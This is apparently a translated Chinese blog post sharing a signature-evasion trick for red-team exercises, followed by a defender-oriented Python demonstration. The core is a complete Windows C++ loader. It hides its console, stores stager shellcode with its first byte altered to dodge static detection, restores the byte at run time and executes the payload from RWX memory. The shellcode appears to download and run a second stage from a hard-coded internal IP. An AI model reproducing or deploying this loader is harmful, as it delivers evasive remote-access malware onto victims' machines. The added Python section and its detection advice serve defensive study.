We have not posted for a while. What left us weather-beaten and forced the hiatus? It was xx: the masters have all gone to their posts in various places, so articles have become scarce. Today I am sharing a small trick.
This method is offered only as a starting point for discussion; after all, it is an old technique and of limited use.
Principle: change the first few bytes of the shellcode, then restore them at load time.
Straight to the code:
```cpp
#include <windows.h>
#include <cstring>

int main(int argc, char *argv[]) {
    // Hide the console window so nothing is visible to the user.
    ::ShowWindow(::GetConsoleWindow(), SW_HIDE);

    // The payload as stored on disk. Its first byte has been changed from
    // \xfc to \xfe so the static byte pattern no longer matches the
    // untouched payload; it is put back in memory before execution.
    unsigned char shellcode[] =
        "\xfe\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
        "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
        "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
        "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
        "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
        "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
        "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
        "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
        "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
        "\x8d\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c"
        "\x77\x26\x07\xff\xd5\x31\xdb\x53\x53\x53\x53\x53\x68\x3a\x56"
        "\x79\xa7\xff\xd5\x53\x53\x6a\x03\x53\x53\x68\xb3\x15\x00\x00"
        "\xe8\x6a\x01\x00\x00\x2f\x57\x65\x56\x69\x48\x48\x4e\x41\x6f"
        "\x4f\x51\x36\x76\x54\x75\x38\x59\x37\x52\x73\x4d\x41\x38\x68"
        "\x72\x6a\x33\x30\x67\x39\x42\x41\x6c\x42\x35\x66\x45\x68\x33"
        "\x66\x2d\x65\x68\x69\x6e\x46\x42\x33\x45\x4d\x59\x59\x79\x7a"
        "\x46\x34\x53\x34\x6c\x50\x74\x4f\x57\x6a\x4e\x63\x46\x6b\x6f"
        "\x73\x47\x6e\x70\x53\x50\x53\x6e\x33\x64\x73\x53\x7a\x6e\x2d"
        "\x41\x2d\x50\x56\x39\x74\x2d\x6f\x58\x4f\x56\x45\x30\x47\x55"
        "\x61\x63\x34\x61\x41\x68\x42\x53\x67\x57\x58\x69\x6c\x71\x52"
        "\x33\x6b\x6b\x59\x59\x56\x63\x42\x4d\x37\x75\x79\x4f\x70\x38"
        "\x45\x5f\x4d\x70\x44\x30\x35\x39\x4b\x4b\x6b\x4b\x49\x6c\x6a"
        "\x48\x51\x50\x2d\x4d\x32\x75\x64\x4e\x58\x47\x63\x51\x35\x5a"
        "\x4b\x49\x41\x42\x43\x59\x6f\x55\x72\x53\x77\x34\x4e\x59\x35"
        "\x48\x46\x41\x49\x78\x63\x63\x41\x69\x73\x6c\x43\x4c\x44\x76"
        "\x57\x5f\x77\x64\x32\x67\x39\x68\x4d\x51\x54\x31\x39\x50\x50"
        "\x50\x53\x41\x41\x4f\x51\x55\x6b\x68\x4e\x63\x56\x46\x7a\x2d"
        "\x4c\x4a\x47\x38\x52\x58\x38\x61\x6f\x4c\x6b\x2d\x4b\x34\x77"
        "\x46\x48\x72\x00\x50\x68\x57\x89\x9f\xc6\xff\xd5\x89\xc6\x53"
        "\x68\x00\x02\x60\x84\x53\x53\x53\x57\x53\x56\x68\xeb\x55\x2e"
        "\x3b\xff\xd5\x96\x6a\x0a\x5f\x53\x53\x53\x53\x56\x68\x2d\x06"
        "\x18\x7b\xff\xd5\x85\xc0\x75\x14\x68\x88\x13\x00\x00\x68\x44"
        "\xf0\x35\xe0\xff\xd5\x4f\x75\xe1\xe8\x4c\x00\x00\x00\x6a\x40"
        "\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x53\x68\x58\xa4\x53"
        "\xe5\xff\xd5\x93\x53\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53"
        "\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xcf\x8b\x07\x01"
        "\xc3\x85\xc0\x75\xe5\x58\xc3\x5f\xe8\x7f\xff\xff\xff\x31\x39"
        "\x32\x2e\x31\x36\x38\x2e\x31\x31\x34\x2e\x31\x34\x30\x00\xbb"
        "\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";

    // The real first byte, kept separately from the payload.
    char first[] = "\xfc";

    // Allocate an RWX region large enough for the whole payload.
    void *exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (exec == NULL) {
        return 1;
    }

    // Restore the original first byte, copy the payload in, and jump to it.
    memcpy(shellcode, first, 1);
    memcpy(exec, shellcode, sizeof shellcode);
    ((void (*)())exec)();
    return 0;
}
```
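From the detection side, the trick only defeats static checks that depend on the exact bytes at offset 0, such as a file hash or a signature anchored at the start of the blob; the rest of the payload is unchanged on disk and the complete original is rebuilt in memory. The following Python is an added example (not code from the post) that makes this measurable with a constructed, harmless byte string: it compares a hash, an offset-0 signature, an offset-tolerant signature and a body substring signature before and after the one-byte change, and confirms the in-memory image equals the original.

```python
import hashlib

# Constructed sample blob standing in for a payload (not the post's shellcode):
# a recognisable 9-byte prefix, a distinctive string and a repeated 2-byte pattern.
ORIGINAL = bytes.fromhex("fce8820000006089e5") + b"wininet" + bytes([0xff, 0xd5]) * 4


def patch_first_byte(blob: bytes, new_first: int) -> bytes:
    """Copy of blob with byte 0 replaced: the on-disk form the loader ships."""
    return bytes([new_first]) + blob[1:]


def restore_first_byte(blob: bytes, original_first: int) -> bytes:
    """What the loader does at run time: put the real first byte back."""
    return bytes([original_first]) + blob[1:]


def sha256(blob: bytes) -> str:
    return hashlib.sha256(blob).hexdigest()


def prefix_signature_hits(blob: bytes, sig: bytes) -> bool:
    """Signature anchored at offset 0; this is what the one-byte change defeats."""
    return blob.startswith(sig)


def tolerant_prefix_hits(blob: bytes, sig: bytes, skip: int = 1) -> bool:
    """Same prefix signature, but ignoring the first `skip` bytes of both."""
    return blob[skip:].startswith(sig[skip:])


def body_signature_hits(blob: bytes, sig: bytes) -> bool:
    """Signature on a distinctive substring anywhere in the blob."""
    return sig in blob


def compare(original: bytes, new_first: int, prefix_sig: bytes, body_sig: bytes) -> dict:
    """Evaluate each detection approach against the modified on-disk blob."""
    on_disk = patch_first_byte(original, new_first)
    in_memory = restore_first_byte(on_disk, original[0])
    return {
        "hash_changed": sha256(on_disk) != sha256(original),
        "prefix_sig_on_disk": prefix_signature_hits(on_disk, prefix_sig),
        "tolerant_prefix_on_disk": tolerant_prefix_hits(on_disk, prefix_sig),
        "body_sig_on_disk": body_signature_hits(on_disk, body_sig),
        "in_memory_identical": in_memory == original,
    }


if __name__ == "__main__":
    result = compare(ORIGINAL, 0xFE, b"\xfc\xe8\x82", b"wininet")
    for name, value in result.items():
        print(f"{name}: {value}")
```

The `in_memory_identical` result is the key point for defenders: because the loader writes the untouched bytes into an RWX region before calling them, a scan of the process memory after the `memcpy`, or a rule that keys on the allocate-copy-execute behaviour rather than on the file's first byte, sees the original payload.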
ThreatBook (微步在线) scan result:
https://s.threatbook.cn/report/file/4c806570e9b97eeb98e435ca5a8cb260186af96abebeb216c8ecb9c3faa6597a/?sign=history&env=win7_sp1_enx86_office2013
Finally, wishing all the masters a smooth hw.